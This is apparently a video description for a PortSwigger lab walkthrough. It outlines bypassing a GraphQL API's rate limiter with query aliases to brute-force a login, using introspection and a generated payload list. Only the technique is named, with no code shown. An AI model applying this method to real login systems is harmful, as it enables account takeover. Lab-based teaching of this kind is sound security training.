Bypassing GraphQL Brute Force Protections
π©βππ¨βπ Learn about GraphQL API vulnerabilities! The user login mechanism for this lab is powered by a GraphQL API. The API endpoint has a rate limiter that returns an error if it receives too many requests from the same origin in a short space of time. To solve the lab, we must brute force the login mechanism to sign in as carlos.
If youβre struggling with the concepts covered in this lab, please review π§
π Portswigger challenge:
π§π» Sign up and start hacking right now -
πΎ Join our Discord -
ποΈ This show is hosted by ( @_CryptoCat ) &
π Do you want some Intigriti Swag? Check out
Overview:
0:00 Intro
0:25 Bypassing rate limiting using aliases
1:32 Lab: Bypassing GraphQL brute-force protections
2:00 Explore site functionality
2:37 Test brute-force protections
3:43 Set introspection query
4:02 Visualise schema
4:26 Save results to site map
4:44 Recap of intended exploit
5:14 Generate payload list
5:53 Exploit the vulnerability
6:42 Conclusion